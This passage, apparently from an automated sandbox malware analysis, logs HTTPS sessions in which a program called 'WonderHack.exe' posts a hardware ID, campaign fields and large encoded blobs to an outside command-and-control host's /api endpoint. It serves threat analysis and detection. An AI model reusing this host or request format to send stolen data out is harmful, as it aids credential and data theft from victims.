                                                                                                                                                                                                                                                                        Data Ascii: K+blVXIKcNArRUgXK9VmKYbUdggbPjV0dk34rf5FiTco56CGucpmUXjVSBPoRSYsVEZhmErppKTnjCv5eVQf4qh06wpxTzSU+4ZUV3rG82kAUbrEUam1dvdNZ3h9FZym+La0g+odpVu/1xwU69DmKtRGZUiebPCyJJwtvC3STKF4oLST7tglVGtAyAX4QDZpB9Cxz1tt8TImUmS2uVRbJ/gpZ8T/jvWU+plXn39CsikU23SImeK7PzPcLy10VVq


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        3192.168.2.449777104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:16 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=38YTQXSPNP1CBN
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 18146
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:16 UTC15331OUTData Raw: 2d 2d 33 38 59 54 51 58 53 50 4e 50 31 43 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 33 38 59 54 51 58 53 50 4e 50 31 43 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 38 59 54 51 58 53 50 4e 50 31 43 42 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a 2d 2d 33
                                                                                                                                                                                                                                                                        Data Ascii: --38YTQXSPNP1CBNContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--38YTQXSPNP1CBNContent-Disposition: form-data; name="pid"2--38YTQXSPNP1CBNContent-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp--3
                                                                                                                                                                                                                                                                        2024-12-22 23:49:16 UTC2815OUTData Raw: 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77
                                                                                                                                                                                                                                                                        Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!w
                                                                                                                                                                                                                                                                        2024-12-22 23:49:17 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=62te2a48f8l8vue7jlco70aknq; expires=Thu, 17 Apr 2025 17:35:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxOP1HeL0GVTgNe%2FnXjsqGyLwFZllYIcvlDP%2FM%2FohRqN9cwLA9Stw%2Bs%2F2Nwu64eVydIKh53i5xIlQ3lWA%2BetGWMf3mU6dNb%2B71F9oFtS9MYMbnHvlL4ueH3G5q42z6AGOUE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6401e8fde43314-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1807&rtt_var=680&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19103&delivery_rate=1607044&cwnd=207&unsent_bytes=0&cid=2f69cdba9630a2f6&ts=946&x=0"
                                                                                                                                                                                                                                                                        2024-12-22 23:49:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-22 23:49:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        4192.168.2.449784104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:18 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=AF7HU3P5H1T
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 8749
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:18 UTC8749OUTData Raw: 2d 2d 41 46 37 48 55 33 50 35 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 41 46 37 48 55 33 50 35 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 46 37 48 55 33 50 35 48 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a 2d 2d 41 46 37 48 55 33 50 35 48 31
                                                                                                                                                                                                                                                                        Data Ascii: --AF7HU3P5H1TContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--AF7HU3P5H1TContent-Disposition: form-data; name="pid"2--AF7HU3P5H1TContent-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp--AF7HU3P5H1
                                                                                                                                                                                                                                                                        2024-12-22 23:49:19 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ui8fi04rj17u78fvd07qpnhukd; expires=Thu, 17 Apr 2025 17:35:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGIewKP1WbBvD3bX4WJdbceENWFuXPuiJx91LCscq5dNvS6Oze8ZyuAROojsecOhWVGRt8muI40Hg%2BrJfFRYN%2FOxD7HrdianWjLuiBMaIQopUKDSVkkw1njcMJmaB9nfRNI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f6401f70bdf0f73-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1550&rtt_var=623&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2834&recv_bytes=9680&delivery_rate=1883870&cwnd=233&unsent_bytes=0&cid=c7923d92f7e8becd&ts=1103&x=0"
                                                                                                                                                                                                                                                                        2024-12-22 23:49:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-22 23:49:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        5192.168.2.449793104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:20 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=D4D6LD3A1MO86BTXG0I
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 20450
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:20 UTC15331OUTData Raw: 2d 2d 44 34 44 36 4c 44 33 41 31 4d 4f 38 36 42 54 58 47 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 44 34 44 36 4c 44 33 41 31 4d 4f 38 36 42 54 58 47 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 34 44 36 4c 44 33 41 31 4d 4f 38 36 42 54 58 47 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62
                                                                                                                                                                                                                                                                        Data Ascii: --D4D6LD3A1MO86BTXG0IContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--D4D6LD3A1MO86BTXG0IContent-Disposition: form-data; name="pid"3--D4D6LD3A1MO86BTXG0IContent-Disposition: form-data; name="lid"LPnhqo--yb
                                                                                                                                                                                                                                                                        2024-12-22 23:49:20 UTC5119OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: `M?lrQMn 64F6(X&7~
                                                                                                                                                                                                                                                                        2024-12-22 23:49:21 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=0m7ldpc0nrrin5nklv9e4fjmmc; expires=Thu, 17 Apr 2025 17:36:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YlzRlSk%2BBys9kSIViYF3GrU76dLpUIldUZjmspRDtqqIKvSgP3Zd%2BGMSoNg2irrSsrGcYV2rLiEX2Iv7b%2FT2RCmyrjoZ6SphKq2lbIllZvdeJj0VMf6Aqx5VxYffqerRzSE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f640206fac90f80-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1478&rtt_var=590&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21412&delivery_rate=1801357&cwnd=207&unsent_bytes=0&cid=ae363558c3b0f773&ts=973&x=0"
                                                                                                                                                                                                                                                                        2024-12-22 23:49:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-22 23:49:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.449800104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:23 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=SBUV6UEUOZ0XP5Q
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 1225
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:23 UTC1225OUTData Raw: 2d 2d 53 42 55 56 36 55 45 55 4f 5a 30 58 50 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 53 42 55 56 36 55 45 55 4f 5a 30 58 50 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 42 55 56 36 55 45 55 4f 5a 30 58 50 35 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: --SBUV6UEUOZ0XP5QContent-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--SBUV6UEUOZ0XP5QContent-Disposition: form-data; name="pid"1--SBUV6UEUOZ0XP5QContent-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp
                                                                                                                                                                                                                                                                        2024-12-22 23:49:24 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Sun, 22 Dec 2024 23:49:24 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=lpmsa94bs633ehrpmo5c6ugg9g; expires=Thu, 17 Apr 2025 17:36:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BTWq4gz5C%2FVwn1Ql1FVcrZwtjPssG49w%2BUXfwMlFK4ELWZLcRfJssizUepOlzdBCtI7mKsRD2f6kKogBX6pbKY5IvImFSzk7L6ASIJY3KR%2BthEgHYCUF2zN82cJbIjemZrY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f640217fb54430f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1586&rtt_var=619&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2138&delivery_rate=1732937&cwnd=214&unsent_bytes=0&cid=0adfd5c490e226fd&ts=813&x=0"
                                                                                                                                                                                                                                                                        2024-12-22 23:49:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                        2024-12-22 23:49:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.449806104.21.66.864433696C:\Users\user\Desktop\WonderHack.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=WQKZ4A7CKB5
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 587715
                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 2d 2d 57 51 4b 5a 34 41 37 43 4b 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 38 45 34 30 33 41 36 42 45 32 38 32 44 44 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 57 51 4b 5a 34 41 37 43 4b 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 51 4b 5a 34 41 37 43 4b 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 79 62 7a 6b 6c 7a 70 61 6e 6c 77 70 0d 0a 2d 2d 57 51 4b 5a 34 41 37 43 4b 42
                                                                                                                                                                                                                                                                        Data Ascii: --WQKZ4A7CKB5Content-Disposition: form-data; name="hwid"F58E403A6BE282DD37CB803551D62973--WQKZ4A7CKB5Content-Disposition: form-data; name="pid"1--WQKZ4A7CKB5Content-Disposition: form-data; name="lid"LPnhqo--ybzklzpanlwp--WQKZ4A7CKB
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f 2c 92 b3 86 c8 23 75 35 5f 13 bf 72 47 8c 5d df f5 93 78 e7 df 27 68 f0 c4 a2 b6 3e 08 26
                                                                                                                                                                                                                                                                        Data Ascii: i*vhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i*5.=4-?^ =0,#u5_rG]x'h>&
                                                                                                                                                                                                                                                                        2024-12-22 23:49:26 UTC15331OUTData Raw: f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f bb 9c df aa 0d 7a a5 42 a5 17 2f 64 bb 2a 56 5f 9d 3b cc 34 ae ad e6 95 e9 b8 86 32 2d e1
                                                                                                                                                                                                                                                                        Data Ascii: Az!}2R~:,CfwekfDOsLRb1@g=i*<74S_5[i#b|{EW_|OOH?);El~VsIiC4xb}^p*i5vXDS3e_E3N3CiVl8~01zB/d*V_;42-
